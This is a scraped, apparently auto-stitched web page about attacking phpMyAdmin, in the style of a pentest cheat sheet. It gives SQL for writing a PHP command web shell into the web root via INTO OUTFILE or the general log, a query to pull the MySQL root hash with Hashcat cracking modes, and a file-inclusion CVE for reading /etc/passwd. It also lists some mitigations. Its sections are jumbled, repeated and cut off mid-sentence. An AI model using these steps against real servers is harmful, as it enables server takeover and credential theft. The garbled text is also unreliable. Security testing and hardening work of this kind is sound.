Jump to content

Phpmyadmin Hacktricks __full__ May 2026

The following report outlines common exploitation techniques for phpMyAdmin , based on security research and the HackTricks methodology. 1. Initial Access and Reconnaissance Default Credentials

: Attackers frequently check for default or weak credentials (e.g., with no password). Version Identification

: Identifying the specific phpMyAdmin version is critical, as many older versions are vulnerable to public Remote Code Execution (RCE) URL Obfuscation : Securing an instance often involves changing the default /phpmyadmin URL to prevent automated discovery. Exploit-DB 2. Privilege Escalation & Data Exfiltration Arbitrary File Read : Vulnerabilities like CVE-2018-12613

allow attackers to include files from the server, potentially exposing sensitive /etc/passwd or configuration files via local file inclusion (LFI). Database Dumping : Once authenticated, attackers can use the phpmyadmin hacktricks

tab to dump entire databases in formats like SQL, CSV, or XML for offline analysis. Exploit-DB 3. Post-Exploitation: Gaining a Web Shell If the database user has sufficient permissions (e.g.,

privilege), attackers can move from database access to full server compromise: General Log Shell Enable the general log: SET GLOBAL general_log = 'ON'; Set the log file path to a web-accessible directory: SET GLOBAL general_log_file = '/var/www/html/shell.php'; Execute a query containing PHP code: SELECT ""; Access the log file via a browser to execute commands. Slow Query Log Shell : Similar to the general log method, but uses slow_query_log_file

to hide the payload in a file that only records long-running queries. 4. Mitigation and Best Practices To protect phpMyAdmin instances, industry experts recommend: Restricting Access : Use IP whitelisting or place the interface behind a VPN. Two-Factor Authentication : Enable 2FA to prevent credential stuffing. File Permissions : Ensure the database user does not have privileges unless absolutely necessary. Regular Updates : Keep phpMyAdmin updated to the latest stable release to patch known RCE vulnerabilities. for a specific CVE or a remediation checklist for system administrators? Crack with Hashcat mode 7400 (MySQL 5

4. Authentication Bypass (Historical CVEs)

| CVE | Impact | Fixed in | |-----|--------|----------| | CVE-2016-5734 | Brute force using $cfg['AllowArbitraryServer'] | 4.6.3 | | CVE-2018-12613 | File inclusion via target=db_sql.php?/../../ | 4.8.1 | | CVE-2019-12922 | CSRF + RCE | 4.9.0.1 |

Check $cfg['AllowArbitraryServer'] = true; in config.inc.php – allows attacker to connect to external MySQL servers.

1. Extract MySQL Root Hash

SELECT authentication_string FROM mysql.user WHERE user='root';

Crack with Hashcat mode 7400 (MySQL 5.6+) or 300 (pre-4.1). or backup files

3.1 SELECT INTO OUTFILE – Classic Webshell

The oldest trick: write a PHP shell into the web root.

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

  • MySQL secure_file_priv empty or pointing to web root.
  • Write permissions on target directory.

Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";

2. Credential Reuse from Other Breaches

If you have retrieved hashes from /.git/config, .env, or backup files, try reusing those passwords here.